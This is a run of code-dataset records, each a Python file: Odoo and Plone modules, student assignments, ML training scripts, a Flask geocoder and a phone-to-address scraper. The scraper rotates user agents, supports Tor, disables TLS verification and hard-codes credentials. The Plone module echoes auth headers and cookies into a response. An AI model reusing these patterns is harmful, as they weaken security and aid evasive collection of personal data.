res.get('update_id')\n\t\t\tif update_id:\n\t\t\t\tupdate_ids.append(update_id)\n\t\t\tcreate_id = res.get('create_id')\n\t\t\tif create_id:\n\t\t\t\tcreate_ids.append(create_id)\n\t\t\tmapping_id = update_id or create_id\n\t\t\tif mapping_id:\n\t\t\t\tsync_vals['status'] = 'success'\n\t\t\t\tsync_vals['ecomstore_refrence'] = mapping_id.store_customer_id\n\t\t\t\tsync_vals['odoo_id'] = mapping_id.odoo_partner_id\n\t\t\tsync_vals['summary'] = msz\n\t\t\trecord.channel_id._create_sync(sync_vals)\n\t\tif self._context.get('get_mapping_ids'):\n\t\t\t return dict(\n\t\t\t\tupdate_ids=update_ids,\n\t\t\t\tcreate_ids=create_ids,\n\t\t\t)\n\t\tmessage = self.get_feed_result(feed_type='Partner')\n\t\treturn self.env['multi.channel.sale'].display_message(message)\n\n\t","sub_path":"ijvine_ebay/ijvine_ebay_base/models/feeds/partner_feed.py","file_name":"partner_feed.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"212577240","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/Products/BastionCrypto/SignedDocument.py\n# Compiled at: 2012-03-06 02:26:51\n\"\"\"$id$\"\"\"\n__version__ = '$Revision: 67 $'[11:-2]\nimport AccessControl\nfrom zExceptions.unauthorized import Unauthorized\nfrom Acquisition import aq_base\nfrom Products.ATContentTypes.content.document import ATDocument as Document\nfrom Products.CMFCore.permissions import View, ModifyPortalContent\nfrom Permissions import sign_documents\nfrom DocumentTemplate.DT_Util import html_quote\nfrom zope.structuredtext.html import HTML\nfrom App.Common import rfc1123_date\nfrom Products.CMFCore.utils import getToolByName\nimport BastionPGPKey\nformat_stx = HTML()\ntry:\n from webdav.Lockable import wl_isLocked\nexcept ImportError:\n\n def wl_isLocked(ob):\n return 0\n\n\ndef html_headcheck(html):\n \"\"\" Return 'true' if document looks HTML-ish enough.\n\n If true bodyfinder() will be able to find the HTML body.\n \"\"\"\n lowerhtml = html.lower()\n if lowerhtml.find('')\n else:\n self.cooked_text = format_stx(cooked_text, level=self._stx_level)\n\n def edit(self, text_format='text/html', text='', file='', safety_belt=''):\n \"\"\"\n *used to be WorkflowAction(_edit)\n To add webDav support, we need to check if the content is locked, and if\n so return ResourceLockedError if not, call _edit.\n\n Note that this method expects to be called from a web form, and so\n disables header processing\n \"\"\"\n self.failIfLocked()\n if file and type(file) is not type(''):\n contents = file.read()\n if contents:\n text = self.text = contents\n if html_headcheck(text):\n text = bodyfinder(text)\n self.setFormat(text_format)\n self._edit(text=text, text_format=text_format, safety_belt=safety_belt)\n self.reindexObject()\n\n def CookedBody(self, stx_level=None, setlevel=0):\n \"\"\" The prepared basic rendering of an object. For Documents, this\n means pre-rendered structured text, or what was between the\n tags of HTML.\n\n If the format is html, and 'stx_level' is not passed in or is the\n same as the object's current settings, return the cached cooked\n text. Otherwise, recook. If we recook and 'setlevel' is true,\n then set the recooked text and stx_level on the object.\n \"\"\"\n if self.text_format == 'html' or self.text_format == 'plain' or stx_level is None or stx_level == self._stx_level:\n return self.cooked_text\n else:\n cooked = format_stx(self.cooked_text, stx_level)\n if setlevel:\n self._stx_level = stx_level\n self.cooked_text = cooked\n return cooked\n return\n\n def EditableBody(self):\n \"\"\" The editable body of text. 
This is the raw structured text, or\n in the case of HTML, what was between the tags.\n \"\"\"\n return self.no_signatures()\n\n def handleText(self, text, format=None, stx_level=None):\n \"\"\" Handles the raw text, returning headers, body, format \"\"\"\n headers = {}\n if not format:\n format = self.guessFormat(text)\n if format == 'html':\n parser = SimpleHTMLParser()\n parser.feed(text)\n headers.update(parser.metatags)\n if parser.title:\n headers['Title'] = parser.title\n body = bodyfinder(text)\n else:\n (headers, body) = parseHeadersBody(text, headers)\n if stx_level:\n self._stx_level = stx_level\n return (\n headers, body, format)\n\n def guessFormat(self, text):\n \"\"\" Simple stab at guessing the inner format of the text \"\"\"\n if html_headcheck(text):\n return 'html'\n else:\n return 'structured-text'\n\n def sign_bastioncrypto(self, REQUEST, RESPONSE):\n \"\"\"\n return the raw text suitable for our bastioncryptosign to clearsign it\n the Content-Type is set to application/x-crypto-signable\n \"\"\"\n r = []\n r.append('url:%s' % self.absolute_url())\n r.append('lock:1')\n member = getToolByName(self, 'portal_membership').getAuthenticatedMember()\n key_id = member.getProperty('email')\n r.append('arguments:--clearsign')\n try:\n if REQUEST._auth[(-1)] == '\\n':\n auth = REQUEST._auth[:-1]\n else:\n auth = REQUEST._auth\n r.append('auth:%s' % auth)\n except:\n pass\n\n r.append('cookie:%s' % REQUEST.environ.get('HTTP_COOKIE', ''))\n if wl_isLocked(self):\n mt = getToolByName(self, 'portal_membership')\n user_id = member.getId()\n for lock in self.wl_lockValues():\n if not lock.isValid():\n continue\n creator = lock.getCreator()\n if creator and creator[1] == user_id:\n r.append('lock-token:%s' % lock.getLockToken())\n if REQUEST.get('borrow_lock'):\n r.append('borrow_lock:1')\n break\n\n r.append('')\n RESPONSE.setHeader('Last-Modified', rfc1123_date())\n RESPONSE.setHeader('Content-Type', 'application/x-bastioncrypto')\n r.append(self.text)\n return ('\\n').join(r)\n\n def PUT(self, REQUEST, RESPONSE):\n \"\"\"\n return from our bastioncrypto (and anything else which is \n supposedly signing this thing) ...\n \"\"\"\n self.dav__init(REQUEST, RESPONSE)\n self.dav__simpleifhandler(REQUEST, RESPONSE, refresh=1)\n self._edit(REQUEST['BODYFILE'].read())\n RESPONSE.setStatus(204)\n return RESPONSE\n\n\nAccessControl.class_init.InitializeClass(SignedDocument)\n\ndef addSignedDocument(self, id, title=''):\n \"\"\"\n Plone ctor for Signed Document\n \"\"\"\n self._setObject(id, SignedDocument(id, title=title))\n return id","sub_path":"pycfiles/Products.BastionCrypto-4.0.2-py2.6/SignedDocument.py","file_name":"SignedDocument.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"22293354","text":"import requests\nfrom lxml import html\nimport sys\nimport pymysql\nfrom bs4 import BeautifulSoup\nfrom stem import Signal\nfrom stem.control import Controller\nimport time\nimport random\nimport string\nimport pandas as pd\n\nheaders={'User-Agent': 'Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}\nUAS = (\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\", \n \"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0\",\n \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36\",\n )\nua = UAS[random.randrange(len(UAS))]\nheaders = {'user-agent':ua}\ntranslator = str.maketrans(string.punctuation, ' '*len(string.punctuation))\n\n\ndef get_tor_session():\n session = requests.session()\n # Tor uses the 9050 port as the default socks port\n session.proxies = {'http': 'socks5://127.0.0.1:9050',\n 'https': 'socks5://127.0.0.1:9050'}\n return session\n\n# signal TOR for a new connection \ndef renew_connection():\n with Controller.from_port(port = 9051) as controller:\n controller.authenticate(password=\"1234\")\n controller.signal(Signal.NEWNYM)\n\n\ndef db_connection():\n\tconn= pymysql.connect(\"localhost\",\"root\",\"root\",\"lookup\")\n\tcur=conn.cursor()\n\treturn conn,cur\n\n\ndef search_phone(number):\n\tnumber=number.translate(translator)\n\tnumber=\"\".join(number.split())\n\tprint(number)\n\tfinal_result=[]\n\tstreetaddress,locality,region,pcode=(\"\" for i in range(4))\n\turl=\"https://www.yellowpages.com/search?search_terms=\"+number+\"&geo_location_terms=global\"\n\ttry:\n\t\tr=requests.get(url,verify=False,timeout=30,headers=headers)\n\t\tprint(r.status_code)\n\t\tsoup=BeautifulSoup(r.content,\"html.parser\")\n\t\taddresses=soup.findAll(class_='street-address')\n\n\t\tif addresses:\n\t\t\twith open('output/'+number+'.txt','w',encoding='utf-8') as f:\n\t\t\t\n\t\t\t\tfor address in addresses:\n\t\t\t\t\tstreetaddress=address.text\n\t\t\t\t\tfor i in soup.findAll(class_='locality'):\n\t\t\t\t\t\tlocality=i.text.replace('\\xa0', '')\n\t\t\t\t\tfor x in soup.findAll(\"span\",itemprop=\"addressRegion\"):\n\t\t\t\t\t\tregion=x.text\n\t\t\t\t\tfor y in soup.findAll(\"span\",itemprop=\"postalCode\"):\n\t\t\t\t\t\tpcode=y.text\n\t\t\t\t\tresult={'number':number,'streetaddress':streetaddress,'locality':locality,'region':region,'pcode':pcode}\n\t\t\t\t\tfinal_result.append(result)\n\t\t\t\tprint(final_result)\n\t\t\t\tf.write(str(final_result))\n\t\t\t\tf.close()\n\t\treturn 1,final_result\n\texcept:\n\t\tprint('>>>>>>>>>>error')\n\t\t\t\n\nif __name__ == '__main__':\n\n\t# number='518-234-2000'\n\t# number=sys.argv[1]\n\tindputdata=pd.read_csv('contacts_1.csv').head(100)\n\tindputdata=indputdata.Domain\n\t# print(session.get(\"http://httpbin.org/ip\").text)\n\tfor i in indputdata:\n\t\ttime.sleep(2)\n\t\tsearch_phone(i)\n","sub_path":"phone_number_lookup_1.py","file_name":"phone_number_lookup_1.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40112790","text":"def main():\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\user.txt\", \"r\")\r\n lis = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n if not a: break\r\n f.readline()\r\n b = f.readline()\r\n b = b[0:-1]\r\n user = {'Id number': a, 'screen name': b}\r\n f.readline()\r\n lis.append(user)\r\n\r\n f.close()\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\friend.txt\", \"r\")\r\n for i in range(len(lis)):\r\n lis[i]['friends'] = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n b = f.readline()\r\n b = b[0:-1]\r\n f.readline()\r\n i = 0\r\n if not a: break\r\n for i in range(len(lis)):\r\n h = lis[i].get('Id number')\r\n\r\n if a == h:\r\n lis[i]['friends'].append(b) # 친구관계 저장\r\n break\r\n f.close()\r\n\r\n f = open(\"C:\\\\cp949\\\\cp949\\\\word.txt\", \"r\")\r\n for i in range(len(lis)):\r\n lis[i][\"tweet\"] = []\r\n while True:\r\n a = f.readline()\r\n a = a[0:-1]\r\n if not a: break\r\n f.readline()\r\n b = f.readline()\r\n b = b[0:-1]\r\n f.readline()\r\n for i in range(len(lis)):\r\n h = lis[i].get('Id number')\r\n if a == h:\r\n lis[i]['tweet'].append(b)\r\n break\r\n f.close()\r\n\r\n word_temp = ''\r\n while True:\r\n print(\"\"\"0. Read data files\r\n 1. display statistics\r\n 2. Top 5 most tweeted words\r\n 3. Top 5 most tweeted users\r\n 4. Find users who tweeted a word (e.g., ’연세대’)\r\n 5. Find all people who are friends of the above users\r\n 6. Delete all mentions of a word\r\n 7. Delete all users who mentioned a word\r\n 8. Find strongly connected components\r\n 9. Find shortest path from a given user\r\n 99. Quit\r\n Select Menu:\"\"\", end='')\r\n a = input()\r\n if a == '0':\r\n fn = 0\r\n for i in range(len(lis)):\r\n w = len(lis[i]['friends'])\r\n fn += w\r\n for j in range(len(lis[i]['friends'])):\r\n s = lis[i].get('friends')\r\n idn = lis[i].get('Id number')\r\n sd = s[j]\r\n for y in range(i + 1, len(lis) - 1):\r\n if lis[y].get('Id number') == sd and idn in lis[y]['friends']:\r\n fn -= 1 # 겹치는거 뺀 총 친구관계 fn\r\n tw = 0\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n tw += e # 총트위트수\r\n print(\"Total users: %s\" % len(lis))\r\n print(\"Total friendship records: %s\" % fn)\r\n print(\"Total tweets: %s\" % tw)\r\n elif a == '1':\r\n tw = 0\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n tw += e # 총트위트수\r\n atw = tw / len(lis)\r\n arrangeTw = []\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n arrangeTw.append(e)\r\n arrangeTw.sort()\r\n fn = 0\r\n arrangeFn = []\r\n for i in range(len(lis)):\r\n w = len(lis[i]['friends'])\r\n fn += w\r\n for j in range(len(lis[i]['friends'])):\r\n s = lis[i].get('friends')\r\n idn = lis[i].get('Id number')\r\n sd = s[j]\r\n for y in range(i + 1, len(lis) - 1):\r\n if lis[y].get('Id number') == sd and idn in lis[y]['friends']:\r\n fn -= 1 # 겹치는거 뺀 총 친구관계 fn\r\n arrangeFn.append(w)\r\n arrangeFn.sort()\r\n anf = fn / len(lis)\r\n print('Average number of friends: %s' % anf)\r\n print('Minimum friends: %s' % arrangeFn[0])\r\n print('Maximum number of friends: %s' % arrangeFn[len(lis)-1])\r\n print('')\r\n print('Average tweets per user: %s' % atw)\r\n print('Minium tweets per user: %s' % arrangeTw[0])\r\n print('Maximu tweets per user: %s' % arrangeTw[len(lis)-1])\r\n elif a == '2':\r\n arrangeTw = []\r\n Tw = []\r\n for i in range(len(lis)):\r\n e = len(lis[i]['tweet'])\r\n arrangeTw.append(e)\r\n arrangeTw.sort()\r\n for i in range(len(lis)):\r\n for j in range(len(lis[i]['tweet'])):\r\n Tw.append(lis[i]['tweet'][j])\r\n Tw.sort()\r\n s = 0\r\n Tlist = []\r\n 
Tnumb = 0\r\n for i in range(len(Tw)):\r\n if i == len(Tw) - 1:\r\n Tnumb += 1\r\n Tdict = {'word': Tw[s], 'number': Tnumb}\r\n Tlist.append(Tdict)\r\n elif Tw[s] == Tw[i]:\r\n Tnumb += 1\r\n else: # Tw[s] != Tw[i]\r\n Tdict = {'word': Tw[s], 'number': Tnumb}\r\n Tlist.append(Tdict)\r\n s = i\r\n Tnumb = 1\r\n for i in range(len(Tlist)):\r\n for j in range(i + 1, len(Tlist) - 1):\r\n if Tlist[i]['number'] < Tlist[j]['number']:\r\n Tlist[i], Tlist[j] = Tlist[j], Tlist[i]\r\n print('단어: %s 개수: %s' % (Tlist[0].get('word'), Tlist[0].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[1].get('word'), Tlist[1].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[2].get('word'), Tlist[2].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[3].get('word'), Tlist[3].get('number')))\r\n print('단어: %s 개수: %s' % (Tlist[4].get('word'), Tlist[4].get('number')))\r\n elif a == '3':\r\n mtu = [] # most tweeted users\r\n for i in range(len(lis)):\r\n usertweet = {'Id': lis[i].get('screen name'), 'Twn': len(lis[i].get('tweet'))}\r\n mtu.append(usertweet)\r\n for i in range(len(mtu)):\r\n for j in range(i + 1, len(mtu)):\r\n if mtu[i]['Twn'] < mtu[j]['Twn']:\r\n mtu[i], mtu[j] = mtu[j], mtu[i]\r\n print('닉네임: %s 트윗 수: %s' % (mtu[0].get('Id'), mtu[0].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[1].get('Id'), mtu[1].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[2].get('Id'), mtu[2].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[3].get('Id'), mtu[3].get('Twn')))\r\n print('닉네임: %s 트윗 수: %s' % (mtu[4].get('Id'), mtu[4].get('Twn')))\r\n elif a == '4' or a == '5':\r\n if a == '4':\r\n word = input()\r\n wordusers = []\r\n for i in range(len(lis)):\r\n for j in range(len(lis[i]['tweet'])):\r\n if lis[i]['tweet'][j] == word:\r\n ha = {'nick': lis[i]['screen name'], 'fri': lis[i]['friends']}\r\n wordusers.append(ha)\r\n break\r\n word_temp = word\r\n for i in range(len(wordusers)):\r\n print(wordusers[i]['nick'])\r\n elif a == '5':\r\n if word_temp != '':\r\n for i in range(len(wordusers)):\r\n\r\n print(\"닉네임: %s 친구: %s\" % (wordusers[i]['nick'], wordusers[i]['fri']))\r\n else:\r\n print(\"입력값이 없습니다. 4를 입력 후 찾고싶은 word를 적어주세요\")\r\n elif a == '6':\r\n delword = input()\r\n for i in range(len(lis)):\r\n t = len(lis[i]['tweet'])\r\n h = []\r\n for j in range(t):\r\n if delword == lis[i]['tweet'][j]:\r\n h.append(lis[i]['tweet'][j])\r\n for k in range(len(h)):\r\n lis[i]['tweet'].remove(h[k])\r\n elif a == '7':\r\n deluser = input()\r\n ht = []\r\n for i in range(len(lis)):\r\n t = len(lis[i]['tweet'])\r\n for j in range(t):\r\n if deluser == lis[i]['tweet'][j]:\r\n ht.append(lis[i])\r\n break\r\n for k in range(len(ht)):\r\n lis.remove(ht[k])\r\n elif a == '8':\r\n pass\r\n elif a == '9':\r\n pass\r\n elif a == '99':\r\n break\r\nmain()","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":8552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"517385634","text":"#!/usr/bin/env python\n\n\"\"\"\nGlobal Python log configuration settings\n@author mblum\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys, traceback\n\nLEVELS = {'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL}\n\nLOG_FORMAT = '%(asctime)s %(name)s:%(levelname)-8s %(message)s'\nLOG_DATE_FORMAT = '%a, %d %b %Y %H:%M:%S'\nOFFSET = '\\t'*5\n\nclass Log4Py(logging.Logger):\n def _log(self, level, msg, args, exc_info=None, extra=None):\n # call parent logging method\n super(Log4Py, self)._log(level, msg, args, exc_info, extra)\n metadata = None\n if len(args) == 0:\n pass\n elif (args is not None) and (args[0] is not None):\n metadata = args[0]\n if 'exception' in metadata:\n exception = metadata['exception']\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stack_trace_header = traceback.format_exception_only(type(exception), exception)\n # remove newlines\n for index, line in enumerate(stack_trace_header):\n stack_trace_header[index] = line.replace('\\n', '')\n stack_trace_body = traceback.format_exc().splitlines()\n stack_trace = stack_trace_header + stack_trace_body\n super(Log4Py, self)._log(level, '\\n{}'.format(OFFSET).join(stack_trace), args)\n\ndef getLogger(name, filename=None, level='debug'):\n \"\"\"\n Instantiate a global logger\n LOG_FILE - defaults to temp.log in the working directory\n LOG_LEVEL - defaults to DEBUG\n\n Find configuration details here:\n https://docs.python.org/2/howto/logging-cookbook.html\n \"\"\"\n log_file = filename\n log_level = level\n logging.basicConfig(level=LEVELS[log_level],\n format=LOG_FORMAT,\n datefmt=LOG_DATE_FORMAT,\n filename=log_file)\n print('configuring logging: {level} to {log}'.format(level=log_level,\n log=log_file))\n # setup custom logger\n logging.setLoggerClass(Log4Py)\n logger = logging.getLogger(name)\n return logger","sub_path":"log4py.py","file_name":"log4py.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"443280198","text":"from pathlib import Path\nimport pickle\nimport gzip\nimport requests\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import TensorDataset, DataLoader\nimport torch.nn.functional as F\n\nlr = 0.5 # learning rate\nepochs = 2 # how many epochs to train for\n\nDATA_PATH = Path('data')\nPATH = DATA_PATH / 'mnist'\n\nDATA_PATH.mkdir(parents=True, exist_ok=True)\n\nURL = 'http://deeplearning.net/data/mnist/'\nFILENAME = 'mnist.pkl.gz'\n\nif not (PATH / FILENAME).exists():\n content = requests.get(URL + FILENAME).content\n (PATH / FILENAME).open('wb').write(content)\nwith gzip.open((PATH / FILENAME).as_posix(), \"rb\") as f:\n ((x_train, y_train), (x_valid, y_valid), _) = pickle.load(f, encoding=\"latin-1\")\n\nx_train, y_train, x_valid, y_valid = map(\n torch.tensor, (x_train, y_train, x_valid, y_valid)\n)\ntrain_ds = TensorDataset(x_train, y_train)\nvalid_ds = TensorDataset(x_valid, y_valid)\nbs = 4\nclass WrappedDataLoader:\n def __init__(self, dl, func):\n self.dl = dl\n self.func = func\n\n def __len__(self):\n return len(self.dl)\n\n def __iter__(self):\n batches = iter(self.dl)\n for b in batches:\n yield (self.func(*b))\n\n\ndef preprocess(x, y):\n return x.view(-1, 1, 28, 28), y\n\n\ndef get_data(train_ds, valid_ds, bs):\n return (\n DataLoader(train_ds, batch_size=bs, shuffle=True),\n DataLoader(valid_ds, batch_size=bs * 2),\n )\n\n\ntrain_dl, valid_dl = get_data(train_ds, valid_ds, bs)\ntrain_dl = WrappedDataLoader(train_dl, preprocess)\nvalid_dl = WrappedDataLoader(valid_dl, preprocess)\n\n\nclass Lambda(nn.Module):\n def __init__(self, func):\n super().__init__()\n self.func = func\n\n def forward(self, x):\n return self.func(x)\n\n\ndef loss_batch(model, loss_func, xb, yb, opt=None):\n loss = loss_func(model(xb), yb)\n\n if opt is not None:\n loss.backward()\n opt.step()\n opt.zero_grad()\n\n return loss.item(), len(xb)\n\n\ndef fit(epochs, model, loss_func, opt, train_dl, valid_dl):\n for epoch in range(epochs):\n batch_num = 0\n model.train()\n for xb, yb in train_dl:\n print(xb.shape, yb.shape)\n # print('Epoch [{}]\\tBatch [{}]'.format(epoch, batch_num))\n loss_batch(model, loss_func, xb, yb, opt)\n batch_num += 1\n\n model.eval()\n with torch.no_grad():\n losses, nums = zip(\n *[loss_batch(model, loss_func, xb, yb) for xb, yb in valid_dl]\n )\n val_loss = np.sum(np.multiply(losses, nums)) / np.sum(nums)\n\n print(epoch, val_loss)\n\n\nmodel = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=16, out_channels=10, kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n nn.AdaptiveAvgPool2d(1),\n Lambda(lambda x: x.view(x.size(0), -1))\n)\nopt = optim.SGD(model.parameters(), lr=lr, momentum=0.9)\nloss_func = F.cross_entropy\nfit(30, model, loss_func, opt, train_dl, valid_dl)\n\ndev = torch.device(\"cuda:3\") if torch.cuda.is_available() else torch.device(\"cpu\")\n","sub_path":"nn_study.py","file_name":"nn_study.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"97042927","text":"from dataset import load_data\nfrom models import MRnet\nfrom config import config\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import _train_model, _evaluate_model, _get_lr\nimport time\nimport torch.utils.data as data\nimport os\n\n\"\"\"Performs training of a specified model.\n \nInput params:\n config_file: Takes in configurations to train with \n\"\"\"\n\ndef train(config : dict):\n \"\"\"\n Function where actual training takes place\n\n Args:\n config (dict) : Configuration to train with\n \"\"\"\n \n print('Starting to Train Model...')\n\n train_loader, val_loader, train_wts, val_wts = load_data(config['task'])\n\n print('Initializing Model...')\n model = MRnet()\n if torch.cuda.is_available():\n model = model.cuda()\n train_wts = train_wts.cuda()\n val_wts = val_wts.cuda()\n\n print('Initializing Loss Method...')\n criterion = torch.nn.BCEWithLogitsLoss(pos_weight=train_wts)\n val_criterion = torch.nn.BCEWithLogitsLoss(pos_weight=val_wts)\n\n if torch.cuda.is_available():\n criterion = criterion.cuda()\n val_criterion = val_criterion.cuda()\n\n print('Setup the Optimizer')\n optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'], weight_decay=config['weight_decay'])\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, patience=3, factor=.3, threshold=1e-4, verbose=True)\n \n starting_epoch = config['starting_epoch']\n num_epochs = config['max_epoch']\n patience = config['patience']\n log_train = config['log_train']\n log_val = config['log_val']\n\n best_val_loss = float('inf')\n best_val_auc = float(0)\n\n print('Starting Training')\n\n writer = SummaryWriter(comment='lr={} task={}'.format(config['lr'], config['task']))\n t_start_training = time.time()\n\n for epoch in range(starting_epoch, num_epochs):\n\n current_lr = _get_lr(optimizer)\n epoch_start_time = time.time() # timer for entire epoch\n\n train_loss, train_auc = _train_model(\n model, train_loader, epoch, num_epochs, optimizer, criterion, writer, current_lr, log_train)\n\n val_loss, val_auc = _evaluate_model(\n model, val_loader, val_criterion, epoch, num_epochs, writer, current_lr, log_val)\n\n writer.add_scalar('Train/Avg Loss', train_loss, epoch)\n writer.add_scalar('Val/Avg Loss', val_loss, epoch)\n\n scheduler.step(val_loss)\n\n t_end = time.time()\n delta = t_end - epoch_start_time\n\n print(\"train loss : {0} | train auc {1} | val loss {2} | val auc {3} | elapsed time {4} s\".format(\n train_loss, train_auc, val_loss, val_auc, delta))\n\n print('-' * 30)\n\n writer.flush()\n\n if val_auc > best_val_auc:\n best_val_auc = val_auc\n\n if bool(config['save_model']):\n file_name = 'model_{}_{}_val_auc_{:0.4f}_train_auc_{:0.4f}_epoch_{}.pth'.format(config['exp_name'], config['task'], val_auc, train_auc, epoch+1)\n torch.save({\n 'model_state_dict': model.state_dict()\n }, './weights/{}/{}'.format(config['task'],file_name))\n\n t_end_training = time.time()\n print(f'training took {t_end_training - t_start_training} s')\n writer.flush()\n writer.close()\n\nif __name__ == '__main__':\n\n print('Training Configuration')\n print(config)\n\n train(config=config)\n\n print('Training Ended...')\n","sub_path":"MRNet-Single-Model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"426654112","text":"\"\"\"1249. 移除无效的括号\n给你一个由 '('、')' 和小写字母组成的字符串 s。\n你需要从字符串中删除最少数目的 '(' 或者 ')'可以删除任意位置的括号),使得剩下的「括号字符串」有效。\n请返回任意一个合法字符串。\n有效「括号字符串」应当符合以下任意一条要求:\n空字符串或只包含小写字母的字符串\n可以被写作AB(A连接B)的字符串,其中A和B都是有效「括号字符串」\n可以被写作(A)的字符串,其中A一个有效的「括号字符串」\n示例 1:\n输入:s = \"lee(t(c)o)de)\"\n输出:\"lee(t(c)o)de\"\n解释:\"lee(t(co)de)\" , \"lee(t(c)ode)\" 也是一个可行答案。\n示例 2:\n输入:s = \"a)b(c)d\"\n输出:\"ab(c)d\"\n示例 3:\n输入:s = \"))((\"\n输出:\"\"\n解释:空字符串也是有效的\n示例 4:\n输入:s = \"(a(b(c)d)\"\n输出:\"a(b(c)d)\"\n\"\"\"\nclass Solution:\n def minRemoveToMakeValid(self, s: str):\n stack = []\n flag = []\n result =[]\n for i in range(len(s)):\n if s[i] == '(':\n stack.append(i)\n elif s[i] == ')':\n if stack:\n stack.pop()\n else:\n flag.append(i)\n else:\n continue\n # 加入多余的左括号的索引\n while stack:\n flag.append(stack.pop())\n for i in range(len(s)):\n if i not in flag:\n result.append(s[i])\n else:\n continue\n result = ''.join(result)\n return result\nsolution = Solution()\nresult = solution.minRemoveToMakeValid(\"lee(t(c)o)de)\")\nprint(result)\n\n\n\n\n\n\n","sub_path":"栈/1249. 移除无效的括号.py","file_name":"1249. 移除无效的括号.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"130856071","text":"from flask import Flask, render_template, request\nfrom redis import Redis\nfrom geopy.geocoders import Nominatim\n\napp = Flask(__name__)\nredis = Redis(host='redis',port=6379)\n\n@app.route('/')\ndef index():\n redis.incr('hits')\n return render_template('index.html', visitor=redis.get('hits'))\n\n@app.route('/address',methods = ['POST', 'GET'])\ndef result():\n\tif request.method == 'POST':\n\t\taddress = request.form\n\t\taddresstrans = \"%s, %s, %s, %s \" % ( request.form.get(\"Street\"), request.form.get(\"Number\"), request.form.get(\"City\"), request.form.get(\"Country\"))\n\t\tgeolocator = Nominatim(user_agent=\"Nadav\")\n\t\tlocation = geolocator.geocode(\"%s\" % addresstrans)\n\t\tcoordinate = \"%.12f', %.12f\" % (location.latitude, location.longitude)\n\t\treturn render_template(\"result.html\",address = address, coordinate = coordinate)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\",debug=True)\n\n","sub_path":"geopy/flask-coordinate-inter/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
